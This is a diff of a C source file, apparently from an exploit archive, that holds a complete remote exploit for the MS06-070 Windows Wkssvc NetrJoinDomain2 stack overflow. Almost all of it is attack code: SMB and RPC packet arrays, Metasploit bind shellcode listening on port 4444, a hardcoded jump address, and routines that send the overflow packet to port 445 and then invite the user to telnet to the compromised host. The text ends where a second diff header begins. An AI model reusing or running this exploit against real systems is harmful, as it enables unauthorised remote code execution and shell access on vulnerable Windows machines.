-"\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
+"\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
-"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
+"\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
-"\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
+"\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
-"\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
+"\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
-"\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";
+"\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";
-
+
-
+
-unsigned char Rpc_Bind_Wkssvc[]=
+unsigned char Rpc_Bind_Wkssvc[]=
-"\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
+"\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
-"\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
+"\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
-"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
+"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
-"\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
+"\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
-"\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
+"\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
-"\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
+"\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
-"\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
+"\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
-"\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
+"\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
-"\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";
+"\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";
-
+
-
+
-unsigned char Rpc_NetrJoinDomain2_Header[]=
+unsigned char Rpc_NetrJoinDomain2_Header[]=
-"\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
+"\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
-"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
+"\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
-"\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
+"\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
-"\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
+"\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
-"\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
+"\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
-"\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
+"\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
-"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
-"\x16\x00"     //opnum,NetrJoinDomain2
+"\x16\x00"     //opnum,NetrJoinDomain2
-"\x30\x2a\x42\x00"
+"\x30\x2a\x42\x00"
-"\x0e\x00\x00\x00"
+"\x0e\x00\x00\x00"
-"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
-"\x0e\x00\x00\x00"
+"\x0e\x00\x00\x00"
-"\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
+"\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
-"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
+"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
-"\x00\x00"
+"\x00\x00"
-"\x10\x01\x00\x00"
+"\x10\x01\x00\x00"
-"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
-"\x10\x01\x00\x00";
+"\x10\x01\x00\x00";
-
+
-
+
-unsigned char Rpc_NetrJoinDomain2_End[]=
+unsigned char Rpc_NetrJoinDomain2_End[]=
-"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
-"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
-"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
-"\x01\x00\x00\x00";
+"\x01\x00\x00\x00";
-
+
-
+
-unsigned char *lpDomainName=NULL;
+unsigned char *lpDomainName=NULL;
-DWORD   dwDomainNameLen=0;
+DWORD   dwDomainNameLen=0;
-
+
-
+
-
+
-/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub
+/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub
-http://metasploit.com */
+http://metasploit.com */
-unsigned char shellcode[] =
+unsigned char shellcode[] =
-"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6e"
+"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6e"
-"\xd2\x50\xd3\x83\xeb\xfc\xe2\xf4\x92\xb8\xbb\x9e\x86\x2b\xaf\x2c"
+"\xd2\x50\xd3\x83\xeb\xfc\xe2\xf4\x92\xb8\xbb\x9e\x86\x2b\xaf\x2c"
-"\x91\xb2\xdb\xbf\x4a\xf6\xdb\x96\x52\x59\x2c\xd6\x16\xd3\xbf\x58"
+"\x91\xb2\xdb\xbf\x4a\xf6\xdb\x96\x52\x59\x2c\xd6\x16\xd3\xbf\x58"
-"\x21\xca\xdb\x8c\x4e\xd3\xbb\x9a\xe5\xe6\xdb\xd2\x80\xe3\x90\x4a"
+"\x21\xca\xdb\x8c\x4e\xd3\xbb\x9a\xe5\xe6\xdb\xd2\x80\xe3\x90\x4a"
-"\xc2\x56\x90\xa7\x69\x13\x9a\xde\x6f\x10\xbb\x27\x55\x86\x74\xfb"
+"\xc2\x56\x90\xa7\x69\x13\x9a\xde\x6f\x10\xbb\x27\x55\x86\x74\xfb"
-"\x1b\x37\xdb\x8c\x4a\xd3\xbb\xb5\xe5\xde\x1b\x58\x31\xce\x51\x38"
+"\x1b\x37\xdb\x8c\x4a\xd3\xbb\xb5\xe5\xde\x1b\x58\x31\xce\x51\x38"
-"\x6d\xfe\xdb\x5a\x02\xf6\x4c\xb2\xad\xe3\x8b\xb7\xe5\x91\x60\x58"
+"\x6d\xfe\xdb\x5a\x02\xf6\x4c\xb2\xad\xe3\x8b\xb7\xe5\x91\x60\x58"
-"\x2e\xde\xdb\xa3\x72\x7f\xdb\x93\x66\x8c\x38\x5d\x20\xdc\xbc\x83"
+"\x2e\xde\xdb\xa3\x72\x7f\xdb\x93\x66\x8c\x38\x5d\x20\xdc\xbc\x83"
-"\x91\x04\x36\x80\x08\xba\x63\xe1\x06\xa5\x23\xe1\x31\x86\xaf\x03"
+"\x91\x04\x36\x80\x08\xba\x63\xe1\x06\xa5\x23\xe1\x31\x86\xaf\x03"
-"\x06\x19\xbd\x2f\x55\x82\xaf\x05\x31\x5b\xb5\xb5\xef\x3f\x58\xd1"
+"\x06\x19\xbd\x2f\x55\x82\xaf\x05\x31\x5b\xb5\xb5\xef\x3f\x58\xd1"
-"\x3b\xb8\x52\x2c\xbe\xba\x89\xda\x9b\x7f\x07\x2c\xb8\x81\x03\x80"
+"\x3b\xb8\x52\x2c\xbe\xba\x89\xda\x9b\x7f\x07\x2c\xb8\x81\x03\x80"
-"\x3d\x81\x13\x80\x2d\x81\xaf\x03\x08\xba\x41\x8f\x08\x81\xd9\x32"
+"\x3d\x81\x13\x80\x2d\x81\xaf\x03\x08\xba\x41\x8f\x08\x81\xd9\x32"
-"\xfb\xba\xf4\xc9\x1e\x15\x07\x2c\xb8\xb8\x40\x82\x3b\x2d\x80\xbb"
+"\xfb\xba\xf4\xc9\x1e\x15\x07\x2c\xb8\xb8\x40\x82\x3b\x2d\x80\xbb"
-"\xca\x7f\x7e\x3a\x39\x2d\x86\x80\x3b\x2d\x80\xbb\x8b\x9b\xd6\x9a"
+"\xca\x7f\x7e\x3a\x39\x2d\x86\x80\x3b\x2d\x80\xbb\x8b\x9b\xd6\x9a"
-"\x39\x2d\x86\x83\x3a\x86\x05\x2c\xbe\x41\x38\x34\x17\x14\x29\x84"
+"\x39\x2d\x86\x83\x3a\x86\x05\x2c\xbe\x41\x38\x34\x17\x14\x29\x84"
-"\x91\x04\x05\x2c\xbe\xb4\x3a\xb7\x08\xba\x33\xbe\xe7\x37\x3a\x83"
+"\x91\x04\x05\x2c\xbe\xb4\x3a\xb7\x08\xba\x33\xbe\xe7\x37\x3a\x83"
-"\x37\xfb\x9c\x5a\x89\xb8\x14\x5a\x8c\xe3\x90\x20\xc4\x2c\x12\xfe"
+"\x37\xfb\x9c\x5a\x89\xb8\x14\x5a\x8c\xe3\x90\x20\xc4\x2c\x12\xfe"
-"\x90\x90\x7c\x40\xe3\xa8\x68\x78\xc5\x79\x38\xa1\x90\x61\x46\x2c"
+"\x90\x90\x7c\x40\xe3\xa8\x68\x78\xc5\x79\x38\xa1\x90\x61\x46\x2c"
-"\x1b\x96\xaf\x05\x35\x85\x02\x82\x3f\x83\x3a\xd2\x3f\x83\x05\x82"
+"\x1b\x96\xaf\x05\x35\x85\x02\x82\x3f\x83\x3a\xd2\x3f\x83\x05\x82"
-"\x91\x02\x38\x7e\xb7\xd7\x9e\x80\x91\x04\x3a\x2c\x91\xe5\xaf\x03"
+"\x91\x02\x38\x7e\xb7\xd7\x9e\x80\x91\x04\x3a\x2c\x91\xe5\xaf\x03"
-"\xe5\x85\xac\x50\xaa\xb6\xaf\x05\x3c\x2d\x80\xbb\x9e\x58\x54\x8c"
+"\xe5\x85\xac\x50\xaa\xb6\xaf\x05\x3c\x2d\x80\xbb\x9e\x58\x54\x8c"
-"\x3d\x2d\x86\x2c\xbe\xd2\x50\xd3";
+"\x3d\x2d\x86\x2c\xbe\xd2\x50\xd3";
-
+
-
+
-DWORD    fill_len_1 =0x84c;     //fill data
+DWORD    fill_len_1 =0x84c;     //fill data
-DWORD    fill_len_2 =0x1000;    //fill rubbish data
+DWORD    fill_len_2 =0x1000;    //fill rubbish data
-DWORD    addr_jmp_ebx=0x77f81573;   //jmp ebx address,in ntdll.dll
+DWORD    addr_jmp_ebx=0x77f81573;   //jmp ebx address,in ntdll.dll
-unsigned char  code_jmp8[]=      //jmp 8
+unsigned char  code_jmp8[]=      //jmp 8
-"\xEB\x06\x90\x90";
+"\xEB\x06\x90\x90";
-
+
-unsigned char  *Rpc_NetrJoinDomain2=NULL;
+unsigned char  *Rpc_NetrJoinDomain2=NULL;
-DWORD    dwRpc_NetrJoinDomain2=0;
+DWORD    dwRpc_NetrJoinDomain2=0;
-
+
-
+
-unsigned char  recvbuff[2048];
+unsigned char  recvbuff[2048];
-
+
-
+
-void showinfo(void)
+void showinfo(void)
-{
+{
- printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
+ printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
- printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
+ printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
- printf("page:http://ruder.cdut.net/default.asp\n\n");
+ printf("page:http://ruder.cdut.net/default.asp\n\n");
- printf("successfully test on Windows 2000 Server SP4(chinese)\n\n");
+ printf("successfully test on Windows 2000 Server SP4(chinese)\n\n");
- printf("usage:\n");
+ printf("usage:\n");
- printf("ms06070 targetip DomainName\n\n");
+ printf("ms06070 targetip DomainName\n\n");
- printf("notice:\n");
+ printf("notice:\n");
- printf("Make sure the DomainName is valid and live,more informations
+ printf("Make sure the DomainName is valid and live,more informations
-see\n");
+see\n");
-printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
+printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
- printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");
+ printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");
-
+
-}
+}
-
+
-void neg ( int s )
+void neg ( int s )
-{
+{
- char response[1024];
+ char response[1024];
-
+
- memset(response,0,sizeof(response));
+ memset(response,0,sizeof(response));
-
+
- send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
+ send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
-}
+}
-
+
-
+
-
+
-void MakeAttackPacket(char *lpDomainNameStr)
+void MakeAttackPacket(char *lpDomainNameStr)
-{
+{
- DWORD  j,len,b_flag;
+ DWORD  j,len,b_flag;
-
+
-
+
-
+
- dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
+ dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
- lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
+ lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
-
+
- memset(lpDomainName,0,dwDomainNameLen);
+ memset(lpDomainName,0,dwDomainNameLen);
-
+
-MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);
+MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);
-
+
- *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
+ *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
- *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
+ *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
-
+
- len=dwDomainNameLen+     //DomainName
+ len=dwDomainNameLen+     //DomainName
- fill_len_1-3*2+      //fill_len_1
+ fill_len_1-3*2+      //fill_len_1
- 4+         //jmp 8
+ 4+         //jmp 8
- 4+         //addr jmp ebx
+ 4+         //addr jmp ebx
- sizeof(shellcode)-1+    //shellcode
+ sizeof(shellcode)-1+    //shellcode
- fill_len_2+       //fill_len_2
+ fill_len_2+       //fill_len_2
- 2;         //0x0000
+ 2;         //0x0000
-
+
- b_flag=0;
+ b_flag=0;
- if (len%2==1)
+ if (len%2==1)
- {
+ {
- len++;
+ len++;
- b_flag=1;
+ b_flag=1;
- }
+ }
-
+
-
+
- dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
+ dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
-       len+
+       len+
-       sizeof(Rpc_NetrJoinDomain2_End)-1; //end
+       sizeof(Rpc_NetrJoinDomain2_End)-1; //end
-
+
-
+
- //malloc
+ //malloc
- Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
+ Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
- if (Rpc_NetrJoinDomain2==NULL)
+ if (Rpc_NetrJoinDomain2==NULL)
- {
+ {
- printf("malloc error!\n");
+ printf("malloc error!\n");
- return;
+ return;
- }
+ }
-
+
- //fill nop
+ //fill nop
- memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);
+ memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);
-
+
-
+
- j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
+ j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
-
+
- //update para1 length
+ //update para1 length
- *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
+ *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
- *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;
+ *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;
-
+
-
+
- //copy header
+ //copy header
-
+
-memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);
+memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);
-
+
- j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
+ j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
-
+
- //copy DomainName
+ //copy DomainName
- memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
+ memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
- j=j+dwDomainNameLen;
+ j=j+dwDomainNameLen;
-
+
- //calculate offset
+ //calculate offset
- j=j+fill_len_1-3*2;
+ j=j+fill_len_1-3*2;
-
+
- //jmp 8
+ //jmp 8
- memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
+ memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
- j=j+4;
+ j=j+4;
-
+
- //jmp ebx address
+ //jmp ebx address
- *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
+ *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
- j=j+4;
+ j=j+4;
-
+
- //copy shellcode
+ //copy shellcode
- memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
+ memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
- j=j+sizeof(shellcode)-1;
+ j=j+sizeof(shellcode)-1;
-
+
- //fill data
+ //fill data
- memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
+ memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
- j=j+fill_len_2;
+ j=j+fill_len_2;
-
+
- //0x0000(NULL)
+ //0x0000(NULL)
- if (b_flag==0)
+ if (b_flag==0)
- {
+ {
- Rpc_NetrJoinDomain2[j]=0x00;
+ Rpc_NetrJoinDomain2[j]=0x00;
- Rpc_NetrJoinDomain2[j+1]=0x00;
+ Rpc_NetrJoinDomain2[j+1]=0x00;
- j=j+2;
+ j=j+2;
- }
+ }
- else if (b_flag==1)
+ else if (b_flag==1)
- {
+ {
- Rpc_NetrJoinDomain2[j]=0x00;
+ Rpc_NetrJoinDomain2[j]=0x00;
- Rpc_NetrJoinDomain2[j+1]=0x00;
+ Rpc_NetrJoinDomain2[j+1]=0x00;
- Rpc_NetrJoinDomain2[j+2]=0x00;
+ Rpc_NetrJoinDomain2[j+2]=0x00;
- j=j+3;
+ j=j+3;
- }
+ }
-
+
-
+
- //copy other parameter
+ //copy other parameter
-
+
-memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);
+memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);
-
+
- j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
+ j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
-
+
-
+
-}
+}
-
+
-
+
-
+
-void main(int argc,char **argv)
+void main(int argc,char **argv)
-{
+{
- WSADATA    ws;
+ WSADATA    ws;
- struct sockaddr_in server;
+ struct sockaddr_in server;
-   SOCKET    sock;
+   SOCKET    sock;
- DWORD    ret;
+ DWORD    ret;
- WORD    userid,treeid,fid;
+ WORD    userid,treeid,fid;
-
+
-
+
- showinfo();
+ showinfo();
-
+
- return;
+ return;
-
+
- WSAStartup(MAKEWORD(2,2),&ws);
+ WSAStartup(MAKEWORD(2,2),&ws);
-
+
-
+
-
+
-
+
-   sock = socket(AF_INET,SOCK_STREAM,0);
+   sock = socket(AF_INET,SOCK_STREAM,0);
-   if(sock<=0)
+   if(sock<=0)
- {
+ {
-       return;
+       return;
- }
+ }
-
+
-   server.sin_family = AF_INET;
+   server.sin_family = AF_INET;
-   server.sin_addr.s_addr = inet_addr(argv[1]);
+   server.sin_addr.s_addr = inet_addr(argv[1]);
-   server.sin_port = htons((USHORT)445);
+   server.sin_port = htons((USHORT)445);
-
+
- printf("[+] Connecting %s\n",argv[1]);
+ printf("[+] Connecting %s\n",argv[1]);
-
+
-   ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
+   ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
- if (ret==-1)
+ if (ret==-1)
- {
+ {
- printf("connect error!\n");
+ printf("connect error!\n");
- return;
+ return;
- }
+ }
-
+
-
+
- neg(sock);
+ neg(sock);
-
+
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
- ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
+ ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
- if (ret<=0)
+ if (ret<=0)
- {
+ {
- printf("send Session_Setup_AndX_Request error!\n");
+ printf("send Session_Setup_AndX_Request error!\n");
- return;
+ return;
- }
+ }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
- userid=*(WORD *)(recvbuff+0x20);       //get userid
+ userid=*(WORD *)(recvbuff+0x20);       //get userid
-
+
-
+
- memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
+ memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
-
+
-
+
- ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
+ ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
- if (ret<=0)
+ if (ret<=0)
- {
+ {
- printf("send TreeConnect_AndX_Request error!\n");
+ printf("send TreeConnect_AndX_Request error!\n");
- return;
+ return;
- }
+ }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
- treeid=*(WORD *)(recvbuff+0x1c);       //get treeid
+ treeid=*(WORD *)(recvbuff+0x1c);       //get treeid
-
+
-
+
- //send NTCreate_AndX_Request
+ //send NTCreate_AndX_Request
- memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2);  //update userid
+ memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2);  //update userid
- memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2);  //update treeid
+ memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2);  //update treeid
-
+
-
+
- ret=send(sock,(char
+ ret=send(sock,(char
-*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
+*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
- if (ret<=0)
+ if (ret<=0)
- {
+ {
- printf("send NTCreate_AndX_Request error!\n");
+ printf("send NTCreate_AndX_Request error!\n");
- return;
+ return;
- }
+ }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
-
+
- fid=*(WORD *)(recvbuff+0x2a);        //get fid
+ fid=*(WORD *)(recvbuff+0x2a);        //get fid
-
+
-
+
- //rpc bind
+ //rpc bind
-
+
- memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
+ memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
- memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
+ memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
- memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
+ memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
- *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
+ *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
-
+
- ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
+ ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
- if (ret<=0)
+ if (ret<=0)
- {
+ {
- printf("send Rpc_Bind_Wkssvc error!\n");
+ printf("send Rpc_Bind_Wkssvc error!\n");
- return;
+ return;
- }
+ }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
-
+
- MakeAttackPacket((char *)argv[2]);
+ MakeAttackPacket((char *)argv[2]);
-
+
-
+
- memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
+ memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
- memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
+ memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
- memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
+ memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
- *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);
+ *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);
-
+
- *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58;  //update Total Data Count
+ *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58;  //update Total Data Count
- *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58;  //update Data Count
+ *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58;  //update Data Count
- *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47;  //update Byte Count
+ *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47;  //update Byte Count
- *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58;  //update Frag Length
+ *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58;  //update Frag Length
-
+
- ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
+ ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
- if (ret<=0)
+ if (ret<=0)
- {
+ {
- printf("send Rpc_NetrJoinDomain2 error!\n");
+ printf("send Rpc_NetrJoinDomain2 error!\n");
- return;
+ return;
- }
+ }
-
+
- printf("[+] Send attack packet successfully.telnet %s:4444?\n",argv[1]);
+ printf("[+] Send attack packet successfully.telnet %s:4444?\n",argv[1]);
-
+
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
+
-
+
-
+
-
+
- closesocket(sock);
+ closesocket(sock);
-
+
-}
+}
-
+
-// milw0rm.com [2006-11-16]
+// milw0rm.com [2006-11-16]
--- a/platforms/windows/remote/2800.cpp
+++ b/platforms/windows/remote/2800.cpp
@ -1,423 +1,423 @@
-/***************************************************************************
+/***************************************************************************
-
+
-Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
+Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
-
+
-by cocoruder(frankruder_at_hotmail.com),2006.11.15
+by cocoruder(frankruder_at_hotmail.com),2006.11.15
-page:http://ruder.cdut.net/default.asp
+page:http://ruder.cdut.net/default.asp
-
+
-Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
